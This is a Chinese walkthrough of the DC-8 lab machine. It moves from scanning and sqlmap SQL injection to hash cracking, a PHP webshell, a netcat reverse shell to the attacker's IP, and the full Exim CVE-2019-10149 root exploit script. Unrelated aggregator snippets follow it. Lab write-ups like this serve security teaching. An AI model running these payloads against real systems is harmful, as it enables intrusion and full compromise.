Mr H
Mr H

DC-8入门练习

1. 信息收集

1.查看目标靶机MAC地址
DC-8入门练习_第1张图片

2.nmap扫描地址

nmap -sP 192.168.1.0/24 -oN nmap.sP

DC-8入门练习_第2张图片

3.nmap扫描端口

nmap -A 192.168.1.6 -p 0-65535 -oN nmap.A

目标开放了80/22端口
DC-8入门练习_第3张图片
4.访问80
利用火狐自带软件,查看网站信息:开源cms模板drupal 7 容器:apache
DC-8入门练习_第4张图片
目标端口发放22端口我们可以进行爆破,但是这种成功率较低。
6.寻找SQL注入点
点啊点发现了,网页通过nid传参,我们可以判断是不是注入点
DC-8入门练习_第5张图片
加单引号 ’ 发现报错,是整形注入 (还爆出sql语句)
DC-8入门练习_第6张图片
而且还有网站页面的路径(这一下收获太大了)
DC-8入门练习_第7张图片

输入and 1=1 和 and 1=2
DC-8入门练习_第8张图片
DC-8入门练习_第9张图片
7.扫描网站目录
针对drupal网站,使用droopescan 扫描:
也可以使用 dirbsearch

安装droopescan

git clone https://github.com/droope/droopescan.git
cd droopescan
pip install -r requirements.txt		(这里我安装了三遍可能是网络原因,出错建议重新安装)

./droopescan scan --help

发现了后台登陆地址:
DC-8入门练习_第10张图片

2. sqlmap爆表

爆数据库
sqlmap -u http://192.168.1.6/?nid=1 --dbs

数据库名:d7db
DC-8入门练习_第11张图片

爆表
sqlmap -u http://192.168.1.6/?nid=1 -D d7db --tables

表名:users
DC-8入门练习_第12张图片

字段名
sqlmap -u http://192.168.1.6/?nid=1 -D d7db -T users --columns

字段:name pass
DC-8入门练习_第13张图片

字段值
sqlmap -u http://192.168.1.6/?nid=1 -D d7db -T users -C name,pass --dump

DC-8入门练习_第14张图片
爆出了账号密码:
但是被hash加密,与此同时,发现有个用户名叫john,提示我们John爆破

John爆破

我们把刚才的哈希值放入创建的字典中;

vim pass.dic
john pass.dic

这里只爆出了John的密码为turtle
DC-8入门练习_第15张图片

登陆后台寻找上传点注入点1

1.浏览网页寻找注入点:
(写入测试代码后必须返回主页提交后才会触发如下)
DC-8入门练习_第16张图片

2.发现确实存在php代码注入
DC-8入门练习_第17张图片
3.写入一句话木马


@eval()$_REQUEST[666];
?>

DC-8入门练习_第18张图片
蚁键连接
但是报错了
DC-8入门练习_第19张图片
这里我们尝试远程命令执行:


system("nc -e /bin/bash 192.168.1.12 6666");
 ?>

DC-8入门练习_第20张图片

4.反弹shell
kali打开端口监听:
DC-8入门练习_第21张图片
成功拿到webshell
DC-8入门练习_第22张图片
进入交互模式:

python -c 'import pty;pty.spawn("/bin/bash")'

DC-8入门练习_第23张图片

提权

方法:
1.查看具有sudo权限不需要密码的命令

sudo -l

2.查看具有suid表示的命令

find / -perm  -4000 2>/dev/null  
find / -perm -u=s -type f 2>/dev/null

3.内核提权,寻找内核版本漏洞,找到exp提权

searchsploit exim

DC-8入门练习_第24张图片
每一个都拿去百度了,发现exim命令在使用时具有root权限,并且还看到一些有关于他的提权漏洞,那么在kali里面直接使用它对应版本的exp提权

DC-8入门练习_第25张图片
版本太多我们查一查 exim的版本
DC-8入门练习_第26张图片
找到这个脚本后把他复制到当前目录下

cp /usr/share/exploitdb/exploits/linux/local/46996.sh ./

在这里插入图片描述
kali开启http服务

python -m SimpleHTTPServer

DC-8入门练习_第27张图片
由于我们反弹shell 得到的用户在当前目录下没有写权限,我们切换至/tmp 目录下

wget http://192.168.1.12:8000/shell.sh

DC-8入门练习_第28张图片
赋予46996.sh执行权限,运行发现报错;
DC-8入门练习_第29张图片
那么只能复制exp的代码了,在网上找到46996.sh脚本的代码,链接:https://www.exploit-db.com/exploits/46996
点击view raw查看代码,然后复制所有代码:

#!/bin/bash

#
# raptor_exim_wiz - "The Return of the WIZard" LPE exploit
# Copyright (c) 2019 Marco Ivaldi 
#
# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). 
# Improper validation of recipient address in deliver_message() 
# function in /src/deliver.c may lead to remote command execution.
# (CVE-2019-10149)
#
# This is a local privilege escalation exploit for "The Return 
# of the WIZard" vulnerability reported by the Qualys Security 
# Advisory team.
#
# Credits:
# Qualys Security Advisory team (kudos for your amazing research!)
# Dennis 'dhn' Herrmann (/dev/tcp technique)
#
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
#
# Vulnerable platforms:
# Exim 4.87 - 4.91
#
# Tested against:
# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
#

METHOD="setuid" # default method
PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'

# usage instructions
function usage()
{
	echo "$0 [-m METHOD]"
	echo
	echo "-m setuid : use the setuid payload (default)"
	echo "-m netcat : use the netcat payload"
	echo
	exit 1
}

# payload delivery
function exploit()
{
	# connect to localhost:25
	exec 3<>/dev/tcp/localhost/25

	# deliver the payload
	read -u 3 && echo $REPLY
	echo "helo localhost" >&3
	read -u 3 && echo $REPLY
	echo "mail from:<>" >&3
	read -u 3 && echo $REPLY
	echo "rcpt to:<$PAYLOAD>" >&3
	read -u 3 && echo $REPLY
	echo "data" >&3
	read -u 3 && echo $REPLY
	for i in {1..31}
	do
		echo "Received: $i" >&3
	done
	echo "." >&3
	read -u 3 && echo $REPLY
	echo "quit" >&3
	read -u 3 && echo $REPLY
}

# print banner
echo
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi '
echo

# parse command line
while [ ! -z "$1" ]; do
	case $1 in
		-m) shift; METHOD="$1"; shift;;
		* ) usage
		;;
	esac
done
if [ -z $METHOD ]; then
	usage
fi

# setuid method
if [ $METHOD = "setuid" ]; then

	# prepare a setuid shell helper to circumvent bash checks
	echo "Preparing setuid shell helper..."
	echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
	gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
	if [ $? -ne 0 ]; then
		echo "Problems compiling setuid shell helper, check your gcc."
		echo "Falling back to the /bin/sh method."
		cp /bin/sh /tmp/pwned
	fi
	echo

	# select and deliver the payload
	echo "Delivering $METHOD payload..."
	PAYLOAD=$PAYLOAD_SETUID
	exploit
	echo

	# wait for the magic to happen and spawn our shell
	echo "Waiting 5 seconds..."
	sleep 5
	ls -l /tmp/pwned
	/tmp/pwned

# netcat method
elif [ $METHOD = "netcat" ]; then

	# select and deliver the payload
	echo "Delivering $METHOD payload..."
	PAYLOAD=$PAYLOAD_NETCAT
	exploit
	echo

	# wait for the magic to happen and spawn our shell
	echo "Waiting 5 seconds..."
	sleep 5
	nc -v 127.0.0.1 31337

# print help
else
	usage
fi

然后vi编辑器编辑一个.sh脚本吧代码复制进去,然后保存,赋予他执行权限。或者可以在本地创建脚本然后wget 下载到tmp目录
执行:

./666.sh -m netcat

DC-8入门练习_第30张图片

DC-8入门练习_第31张图片

你可能感兴趣的:(DC,DC-8,信息安全)

  • UE5自定义编辑器模式 h605866749 ue5编辑器
    UE5自定义编辑器模式1继承UEdModeDefault创建自定义编辑器模式类。重写如下4个函数如classUMyEditorMode:publicUEdModeDefault{virtualvoidEnter()override;virtualvoidActorSelectionChangeNotify()override;virtualvoidCreateToolkit()override;v
  • 4 Spark Streaming TTXS123456789ABC #Sparksparkajax大数据
    4SparkStreaming一级目录1.整体流程2.数据抽象3.DStream相关操作4.SparkStreaming完成实时需求1)WordCount2)updateStateByKey3)reduceByKeyAndWindow一级目录SparkStreaming是一个基于SparkCore之上的实时计算框架,可以从很多数据源消费数据并对数据进行实时的处理,具有高吞吐量和容错能力强等特点。S
  • Flink Connector 写入 Iceberg 流程源码解析_confluent icebergsinkconnector 字节全栈_mMD flinkjava大数据
    //添加Writer算子,有并行度SingleOutputStreamOperatorwriterStream=appendWriter(distributeStream,flinkRowType,equalityFieldIds);//添加Commit算子,并行度固定为1SingleOutputStreamOperatorcommitterStream=appendCommitter(write
  • 【学术会议征稿-第二届生成式人工智能与信息安全学术会议(GAIIS 2025)】人工智能与信息安全的魅力 禁默 学术会议人工智能
    重要信息时间:2025年2月21日-23日地点:中国杭州官网:http://www.ic-gaiis.org简介2025年第二届生成式人工智能与信息安全将于2025年2月21日-23日在中国杭州举行。主要围绕“生成式人工智能与信息安全”的最新研究展开,紧密聚焦AI的热点和难点问题,深入剖析信息安全核心技术。生成式人工智能与信息安全的关系主要体现在以下几个方面:数据安全:生成式人工智能通常需要大量的
  • lidar_camera_calib代码解读-优化部分 海滩油炸 SLAM标定
    碎碎念最近在调研一下non-target方式的相机Lidar联合标定,其中包括HKmars实验室开源的项目GitHub-hku-mars/livox_camera_calib:ThisrepositoryisusedforautomaticcalibrationbetweenhighresolutionLiDARandcameraintargetlessscenes.这个项目在刚开始并没有得到我的
  • Flink CDC的安装配置 我的K8409 Flinkflink大数据
    FlinkCDC是基于ApacheFlink构建的,用于捕获数据库表中数据的变更情况,包括数据的插入、更新和删除操作,并能将这些变更数据以流的形式实时传输到其他系统中进行处理和分析。传统的数据同步工具往往是定时任务,存在时间延迟。而FlinkCDC能实时捕获数据库的变更数据,一旦有数据变化,立即将其同步到目标系统,让数据在各个系统之间保持高度一致,几乎不存在延迟。CDC含义:变更数据捕获(Chan
  • Azure 虚拟数据中心:构建企业级云架构的利器 齐飞锴Timothea
    Azure虚拟数据中心:构建企业级云架构的利器vdcToolkittoaccelerateAzureadoptionforenterprisecustomers项目地址:https://gitcode.com/gh_mirrors/vd/vdc项目介绍Azure虚拟数据中心(AzureVirtualDatacenter,简称VDC)是一个专为企业级客户设计的工具包,旨在帮助用户在Microsoft
  • 大数据笔记之 Flink1.17 算子 凡许真 大数据flink1.17算子
    文章目录前言一、Partition分区(物理分区)1.1随机分区shuffle1.2轮询分区rebalance1.3重缩放分区rescale1.4广播分区broadcast1.5全局分区global1.6keyby1.7自定义分区Custom二、transform2.1flatMap2.2filter2.3RichFunction2.4map三、Aggregate聚合3.1keyBy()3.2ma
  • (25-4-01)基于本地知识库的自动问答系统(LangChain+ChatGLM+ModelScope/Huggingface部署): 构建和部署对话系统(1) 码农三叔 《NLP算法实战》训练RAG多模态)langchainpython自然语言处理语言模型bert文心一言Huggingface
    13.3.4构建和部署对话系统文件jina_serving.py定义了一个名为KnowledgeBasedChatLLM的类,用于初始化模型配置、加载文件、检索问题答案等操作。其中,LangChain是文件jina_serving.py中的一个重要组件,它通过将自然语言处理技术与信息检索技术相结合,实现了以下功能:模型管理与加载:通过init_model和reinit_model函数,实现了模型的
  • 【阿里云 centos7安装python3.12遇到的坑,openssl】Could not build the ssl module! Python requires a OpenSSL 1.1.1 sky-开发 阿里云sslpython
    Couldnotbuildthesslmodule!基于源码安装python3.12,执行`make`出现如下错误openssl官网版本推荐安装openssl安装python基于源码安装python3.12,执行make出现如下错误_hashlib_ssl_tkinterTofindthenecessarybits,lookinconfigure.acandconfig.log.Couldnotb
  • 非线性动力学笔记C3.4叉型分岔 阿北Ben 笔记数学建模
    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言C3bifurcation3.3叉型分岔(pitchforkbifurcation)1.超临界叉型分岔标准型为:例3.4.1例3.4.22.次临界叉型分岔前言提示:这里可以添加本文要记录的大概内容:参考书《Nonlineardynamicsandchaos》StevenH.Strogatz本节重点Note第三章3.4叉型分
  • 软件测试面试笔试题-选择题(物联网) 测试界媛姐 自动化测试软件测试面试软件测试面试职场和发展软件测试
    1.在软件生命周期中,测试人员从那个阶段开始参与更有利于软件项目的成功()a)需求分析阶段b)设计阶段c)编码阶段d)系统测试阶段2.在Bugzilla缺陷跟踪系统中,下列选项中属于缺陷状态的是()(选两项)a)newb)fixedclaterd)verified3.在Bugzilla中,如果一个缺陷的处理状态被开发人员置为Wontfix,则表明()a)这个Bug中描述的不是问题d)这个Bug中描
  • 2020 年 12 月大学英语四级考试真题(第 2 套)——纯享题目版 fo安方 英语—四级CET4四级英语学习
    个人主页:fo安方的博客✨个人简历:大家好,我是fo安方,目前中南大学MBA在读,也考取过HCIECloudComputing、CCIESecurity、PMP、CISP、RHCE、CCNPRS、PEST3等证书。兴趣爱好:b站天天刷,题目常常看,运动偶尔做,学习需劳心,寻觅些乐趣。欢迎大家:这里是CSDN,是我记录我的日常学习,偶尔生活的地方,喜欢的话请一键三连,有问题请评论区讨论。导读页:这是
  • 2.3、numpy 数组:广播机制、遍历数组 融码一生 Python数据处理与分析numpynumpypython开发语言数据分析
    点击上方分类专栏、进行系统性学习(文末可扫码领取资料)1、广播机制NumPy中的广播机制(Broadcast)旨在解决不同形状数组之间的算术运算问题。如果进行运算的两个数组形状完全相同,它们直接可以做相应的运算。importnumpyasnpa=np.array([0.1,0.2,0.3,0.4])b=np.array([10,20,30,40])c=a*b#jy:[1.4.9.16.]print
  • ArrayList,经典永不过时,掌握设计亮点和面试技巧 java
    1核心知识点底层数据存储结构初始化容量扩容机制线程安全时间复杂度2关键代码分析从add方法开始分析publicbooleanadd(Ee){//步骤1ensureCapacityInternal(size+1);//IncrementsmodCount!!//步骤2elementData[size++]=e;returntrue;}步骤1:确保内部容量充足,走进ensureCapacityInte
  • 基于Hutool的Merkle树hash值生成工具 星极天下第一 Java哈希算法算法java
    SHAUtil工具packagecom.blockchain.qgy.util;importcom.xiaoleilu.hutool.crypto.digest.DigestUtil;importorg.apache.commons.codec.binary.Hex;importjava.nio.charset.StandardCharsets;importjava.security.Messag
  • spring.cloud.nacos.config.shared-configs property hshpy springjava前端
    InNacos,thespring.cloud.nacos.config.shared-configspropertyisusedtoloadadditionalsharedconfigurationsthatarenotdirectlytiedtothespecificapplicationbutcanbesharedacrossmultipleapplicationsorenvironment
  • python调用git在windows,ImportError在Windows 10 Git Bash上使用Anaconda Python导入_ssl Kuchiki Touko
    ContextIamworkingbehindacorporateproxywithaself-signedcertificate.Ihavedocumentedthisextensively.TheissuenowisthatTLS/SSLmoduleisnotloadingcorrectlytoevenverifythecertificates.Windows10Anaconda2018.12
  • U504405 破译诸葛亮的密码箱 qystca c语言算法数据结构链表图论深度优先c++
    题目背景在《三国演义》中,诸葛亮以其卓越的智慧和深思熟虑的战略而著称。某日,诸葛亮在蜀汉准备重要军事行动时,为了确保信息安全,他将一份机密文件放到一个密码箱里面,并设置了一道谜题,只有解出谜题才能知道密码。题目描述诸葛亮有一棵有n个顶点的树。初始时,所有顶点都是白色的。树上有两颗棋子,分别叫做PA和PB。PA和PB最初分别位于顶点a和b。在一个步骤中,诸葛亮将依次执行以下操作:将PA移动到相邻顶点
  • 安装openssl报错:openssl: symbol lookup error: openssl: undefined symbol: EVP_mdc2, version OPENSSL_1_1_0 dg1011 linux
    首先,安装网上教程对openssl进行了安装sudowgethttps://www.openssl.org/source/openssl-1.1.1t.tar.gz如果Linux系统没网,可现在windows上下载压缩文件,再传到Linux系统直接在浏览器输入https://www.openssl.org/source/openssl-1.1.1t.tar.gz就可以下载下来然后进行安装#将安装包
  • 19、智能驾驶信息安全要求 OEM的牛马DRE 智能驾驶控制器硬件介绍网络服务器运维人工智能
    信息安全要求:1.不应存在后门或隐蔽接口要求:系统或设备的设计、开发和生产过程中,应确保不存在任何未经授权或未公开的接口(即后门或隐蔽接口)。这些接口可能会被恶意用户或攻击者利用,绕过正常的安全机制,对系统或设备造成损害或窃取敏感信息。建议:在系统或设备的设计阶段,应进行全面的安全审查,确保所有接口都是明确且文档化的。在开发和测试过程中,应使用专业的安全工具和技术来检测和识别任何潜在的后门或隐蔽接
  • 生产环境WAS产生javacore、dmp、dump文件分析 bubble小拾 1024程序员节java运维
    目录一、分析工具二、Java转储(Javadump)Java转储内容(Javadumpcontents)标题(TITLE)GP信息(GPINFO)环境信息(ENVINFO)本地内存信息(NATIVEMEMINFO)内存信息(MEMINFO)锁(LOCKS)线程(THREADS)钩子(HOOKS)共享类(SHAREDCLASSES)类(CLASSES)场景(Scenarios)一般保护故障(Gene
  • Android createScaledBitmap与Canvas通过RectF drawBitmap生成马赛克/高斯模糊(毛玻璃)对比,Kotlin zhangphil kotlinAndroidandroidkotlin
    AndroidcreateScaledBitmap与Canvas通过RectFdrawBitmap生成马赛克/高斯模糊(毛玻璃)对比,Kotlinimportandroid.graphics.Bitmapimportandroid.graphics.BitmapFactoryimportandroid.graphics.Canvasimportandroid.graphics.RectFimpor
  • CloudCompare 二次开发(37)——点云最近邻插值 点云侠 CloudCompare二次开发c++开发语言算法矩阵3d
    目录一、概述二、代码集成三、结果展示一、概述  使用CloudCompare与PCL编程实现的点云最近邻插值。二、代码集成1、mainwindow.h文件public中添加:voiddoActionNearestInsert();//最近邻插值2、mainwindow.cpp文件voidMainWindow::connectActions()函数中添加:connect(m_UI->actionNe
  • Python的加密与解密_pyarmor解码 2401_84584583 程序员python网络安全
    随着信息化和数字化社会的发展,人们对信息安全和保密的重要性认识不断提高,于是在1997年,美国国家标准局公布实施了“美国数据加密标准(DES)”,民间力量开始全面介入密码学的研究和应用中,采用的加密算法有DES、RSA、SHA等。随着对加密强度需求的不断提高,近期又出现了AES、ECC等。使用密码学可以达到以下目的:保密性:防止用户的标识或数据被读取。数据完整性:防止数据被更改。身份验证:确保数据
  • SpringBoot 集成RabbitMQ 实现钉钉日报定时发送功能 风随心飞飞 SpringBoot+VUE系列springbootjava-rabbitmqrabbitmq
    文章目录一、RabbitMq下载安装二、开发步骤:1.MAVEN配置2.RabbitMqConfig配置3.RabbitMqUtil工具类4.DailyDelaySendConsumer消费者监听5.测试延迟发送一、RabbitMq下载安装官网:https://www.rabbitmq.com/docs二、开发步骤:1.MAVEN配置org.springframework.bootspring-b
  • 【MYSQL】 骑鱼过海的猫123 java数据库sql
    文章目录1.DDL1.DDL--添加字段ALTERTABLE`table_name`addCOLUMN`embed_model`VARCHAR(32)NOTNULLCOMMENT'名称备注'COLLATE'utf8mb4_bin'AFTER`config_code`;--修改字段ALTERTABLE`table_name`CHANGECOLUMN`column_a``column_b`VARCHA
  • postgresql数据库备份与还原 JessieHaha postgresql
    第一步:通过cmd进入到postgresql安装目录的bin下:windows:cdC:\PostgreSQL\pg95\binubuntu:cd/etc/postgresql/9.5/main第二步:备份数据库C:\PostgreSQL\pg95\bin>pg_dump-h164.82.233.54-Upostgresdatabasename>C:\databasename.bak-h:数据库服
  • PostgreSQL备份还原数据库 爪哇岛煮咖啡 PostgreSQL运维数据库postgresql备份还原运维
    1.切换PostgreSQLbin目录配置Postgresql环境变量后可以不用切换pg_dump、psql都在postgresqlbin目录下,所以需要切换到bin目录执行命令2.备份数据库方式一语法pg_dump-h-U-p-d-f示例pg_dump-h127.0.0.1-Upostgres-p9993-dceshi-fE:/tmp/ceshi.sql执行完毕后需要手动输入密码说明:参数【-t
  • VMware安装win10记录 qq_30362711 设计语言
    (1)下载vmware,这个pro现在也免费的,下载地址:https://support.broadcom.com/group/ecx/productfiles?subFamily=VMware%20Workstation%20Pro&displayGroup=VMware%20Workstation%20Pro%2017.0%20for%20Windows&release=17.6.2&os=&
  • 辗转相处求最大公约数 沐刃青蛟 C++漏洞
    无言面对”江东父老“了,接触编程一年了,今天发现还不会辗转相除法求最大公约数。惭愧惭愧!   为此,总结一下以方便日后忘了好查找。   1.输入要比较的两个数a,b   忽略:2.比较大小(因为后面要的是大的数对小的数做%操作)   3.辗转相除(用循环不停的取余,如a%b,直至b=0)   4.最后的a为两数的最大公约数 &
  • F5负载均衡会话保持技术及原理技术白皮书 bijian1013 F5负载均衡
    一.什么是会话保持?        在大多数电子商务的应用系统或者需要进行用户身份认证的在线系统中,一个客户与服务器经常经过好几次的交互过程才能完成一笔交易或者是一个请求的完成。由于这几次交互过程是密切相关的,服务器在进行这些交互过程的某一个交互步骤时,往往需要了解上一次交互过程的处理结果,或者上几步的交互过程结果,服务器进行下
  • Object.equals方法:重载还是覆盖 Cwind javagenericsoverrideoverload
    本文译自StackOverflow上对此问题的讨论。 原问题链接   在阅读Joshua Bloch的《Effective Java(第二版)》第8条“覆盖equals时请遵守通用约定”时对如下论述有疑问: “不要将equals声明中的Object对象替换为其他的类型。程序员编写出下面这样的equals方法并不鲜见,这会使程序员花上数个小时都搞不清它为什么不能正常工作:” pu
  • 初始线程 15700786134
          暑假学习的第一课是讲线程,任务是是界面上的一条线运动起来。            既然是在界面上,那必定得先有一个界面,所以第一步就是,自己的类继承JAVA中的JFrame,在新建的类中写一个界面,代码如下: public class ShapeFr
  • Linux的tcpdump 被触发 tcpdump
    用简单的话来定义tcpdump,就是:dump the traffic on a network,根据使用者的定义对网络上的数据包进行截获的包分析工具。 tcpdump可以将网络中传送的数据包的“头”完全截获下来提供分析。它支 持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。 实用命令实例 默认启动 tcpdump 普通情况下,直
  • 安卓程序listview优化后还是卡顿 肆无忌惮_ ListView
    最近用eclipse开发一个安卓app,listview使用baseadapter,里面有一个ImageView和两个TextView。使用了Holder内部类进行优化了还是很卡顿。后来发现是图片资源的问题。把一张分辨率高的图片放在了drawable-mdpi文件夹下,当我在每个item中显示,他都要进行缩放,导致很卡顿。解决办法是把这个高分辨率图片放到drawable-xxhdpi下。 &nb
  • 扩展easyUI tab控件,添加加载遮罩效果 知了ing jquery
    (function () { $.extend($.fn.tabs.methods, { //显示遮罩 loading: function (jq, msg) { return jq.each(function () { var panel = $(this).tabs(&
  • gradle上传jar到nexus 矮蛋蛋 gradle
    原文地址: https://docs.gradle.org/current/userguide/maven_plugin.html configurations {     deployerJars } dependencies {     deployerJars "org.apache.maven.wagon
  • 千万条数据外网导入数据库的解决方案。 alleni123 sqlmysql
    从某网上爬了数千万的数据,存在文本中。 然后要导入mysql数据库。 悲剧的是数据库和我存数据的服务器不在一个内网里面。。 ping了一下, 19ms的延迟。 于是下面的代码是没用的。 ps = con.prepareStatement(sql); ps.setString(1, info.getYear())............; ps.exec
  • JAVA IO InputStreamReader和OutputStreamReader 百合不是茶 JAVA.io操作 字符流
    这是第三篇关于java.io的文章了,从开始对io的不了解-->熟悉--->模糊,是这几天来对文件操作中最大的感受,本来自己认为的熟悉了的,刚刚在回想起前面学的好像又不是很清晰了,模糊对我现在或许是最好的鼓励 我会更加的去学 加油!: JAVA的API提供了另外一种数据保存途径,使用字符流来保存的,字符流只能保存字符形式的流   字节流和字符的难点:a,怎么将读到的数据
  • MO、MT解读 bijian1013 GSM
    MO= Mobile originate,上行,即用户上发给SP的信息。MT= Mobile Terminate,下行,即SP端下发给用户的信息; 上行:mo提交短信到短信中心下行:mt短信中心向特定的用户转发短信,你的短信是这样的,你所提交的短信,投递的地址是短信中心。短信中心收到你的短信后,存储转发,转发的时候就会根据你填写的接收方号码寻找路由,下发。在彩信领域是一样的道理。下行业务:由SP
  • 五个JavaScript基础问题 bijian1013 JavaScriptcallapplythisHoisting
    下面是五个关于前端相关的基础问题,但却很能体现JavaScript的基本功底。 问题1:Scope作用范围 考虑下面的代码:  (function() { var a = b = 5; })(); console.log(b); 什么会被打印在控制台上?  回答:         上面的代码会打印 5。 &nbs
  • 【Thrift二】Thrift Hello World bit1129 Hello world
    本篇,不考虑细节问题和为什么,先照葫芦画瓢写一个Thrift版本的Hello World,了解Thrift RPC服务开发的基本流程   1. 在Intellij中创建一个Maven模块,加入对Thrift的依赖,同时还要加上slf4j依赖,如果不加slf4j依赖,在后面启动Thrift Server时会报错 <dependency>
  • 【Avro一】Avro入门 bit1129 入门
    本文的目的主要是总结下基于Avro Schema代码生成,然后进行序列化和反序列化开发的基本流程。需要指出的是,Avro并不要求一定得根据Schema文件生成代码,这对于动态类型语言很有用。   1. 添加Maven依赖   <?xml version="1.0" encoding="UTF-8"?> <proj
  • 安装nginx+ngx_lua支持WAF防护功能 ronin47
    需要的软件:LuaJIT-2.0.0.tar.gz                   nginx-1.4.4.tar.gz          &nb
  • java-5.查找最小的K个元素-使用最大堆 bylijinnan java
    import java.util.Arrays; import java.util.Random; public class MinKElement { /** * 5.最小的K个元素 * I would like to use MaxHeap. * using QuickSort is also OK */ public static void
  • TCP的TIME-WAIT bylijinnan socket
    原文连接: http://vincent.bernat.im/en/blog/2014-tcp-time-wait-state-linux.html 以下为对原文的阅读笔记 说明: 主动关闭的一方称为local end,被动关闭的一方称为remote end 本地IP、本地端口、远端IP、远端端口这一“四元组”称为quadruplet,也称为socket 1、TIME_WA
  • jquery ajax 序列化表单 coder_xpf Jquery ajax 序列化
       checkbox 如果不设定值,默认选中值为on;设定值之后,选中则为设定的值   <input type="checkbox" name="favor" id="favor" checked="checked"/> $("#favor&quo
  • Apache集群乱码和最高并发控制 cuisuqiang apachetomcat并发集群乱码
    都知道如果使用Http访问,那么在Connector中增加URIEncoding即可,其实使用AJP时也一样,增加useBodyEncodingForURI和URIEncoding即可。 最大连接数也是一样的,增加maxThreads属性即可,如下,配置如下: <Connector maxThreads="300" port="8019" prot
  • websocket dalan_123 websocket
    一、低延迟的客户端-服务器 和 服务器-客户端的连接 很多时候所谓的http的请求、响应的模式,都是客户端加载一个网页,直到用户在进行下一次点击的时候,什么都不会发生。并且所有的http的通信都是客户端控制的,这时候就需要用户的互动或定期轮训的,以便从服务器端加载新的数据。   通常采用的技术比如推送和comet(使用http长连接、无需安装浏览器安装插件的两种方式:基于ajax的长
  • 菜鸟分析网络执法官 dcj3sjt126com 网络
      最近在论坛上看到很多贴子在讨论网络执法官的问题。菜鸟我正好知道这回事情.人道"人之患好为人师" 手里忍不住,就写点东西吧. 我也很忙.又没有MM,又没有MONEY....晕倒有点跑题. OK,闲话少说,切如正题. 要了解网络执法官的原理. 就要先了解局域网的通信的原理. 前面我们看到了.在以太网上传输的都是具有以太网头的数据包. 
  • Android相对布局属性全集 dcj3sjt126com android
    RelativeLayout布局android:layout_marginTop="25dip" //顶部距离android:gravity="left" //空间布局位置android:layout_marginLeft="15dip //距离左边距 // 相对于给定ID控件android:layout_above 将该控件的底部置于给定ID的
  • Tomcat内存设置详解 eksliang jvmtomcattomcat内存设置
    Java内存溢出详解   一、常见的Java内存溢出有以下三种:   1. java.lang.OutOfMemoryError: Java heap space ----JVM Heap(堆)溢出JVM在启动的时候会自动设置JVM Heap的值,其初始空间(即-Xms)是物理内存的1/64,最大空间(-Xmx)不可超过物理内存。 可以利用JVM提
  • Java6 JVM参数选项 greatwqs javaHotSpotjvmjvm参数JVM Options
    Java 6 JVM参数选项大全(中文版)   作者:Ken Wu Email: [email protected] 转载本文档请注明原文链接 http://kenwublog.com/docs/java6-jvm-options-chinese-edition.htm!   本文是基于最新的SUN官方文档Java SE 6 Hotspot VM Opt
  • weblogic创建JMC i5land weblogicjms
    进入 weblogic控制太 1.创建持久化存储 --Services--Persistant Stores--new--Create FileStores--name随便起--target默认--Directory写入在本机建立的文件夹的路径--ok 2.创建JMS服务器 --Services--Messaging--JMS Servers--new--name随便起--Pers
  • 基于 DHT 网络的磁力链接和BT种子的搜索引擎架构 justjavac DHT
    上周开发了一个磁力链接和 BT 种子的搜索引擎 {Magnet & Torrent},本文简单介绍一下主要的系统功能和用到的技术。 系统包括几个独立的部分: 使用 Python 的 Scrapy 框架开发的网络爬虫,用来爬取磁力链接和种子; 使用 PHP CI 框架开发的简易网站; 搜索引擎目前直接使用的 MySQL,将来可以考虑使
  • sql添加、删除表中的列 macroli sql
    添加没有默认值:alter table Test add BazaarType char(1) 有默认值的添加列:alter table Test add BazaarType char(1) default(0) 删除没有默认值的列:alter table Test drop COLUMN BazaarType 删除有默认值的列:先删除约束(默认值)alter table Test DRO
  • PHP中二维数组的排序方法 abc123456789cba 排序二维数组PHP
    <?php/*** @package     BugFree* @version     $Id: FunctionsMain.inc.php,v 1.32 2005/09/24 11:38:37 wwccss Exp $*** Sort an two-dimension array by some level
  • hive优化之------控制hive任务中的map数和reduce数 superlxw1234 hivehive优化
    一、    控制hive任务中的map数: 1.    通常情况下,作业会通过input的目录产生一个或者多个map任务。 主要的决定因素有: input的文件总个数,input的文件大小,集群设置的文件块大小(目前为128M, 可在hive中通过set dfs.block.size;命令查看到,该参数不能自定义修改);2. 
  • Spring Boot 1.2.4 发布 wiselyman spring boot
    Spring Boot 1.2.4已于6.4日发布,repo.spring.io and Maven Central可以下载(推荐使用maven或者gradle构建下载)。   这是一个维护版本,包含了一些修复small number of fixes,建议所有的用户升级。   Spring Boot 1.3的第一个里程碑版本将在几天后发布,包含许多
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他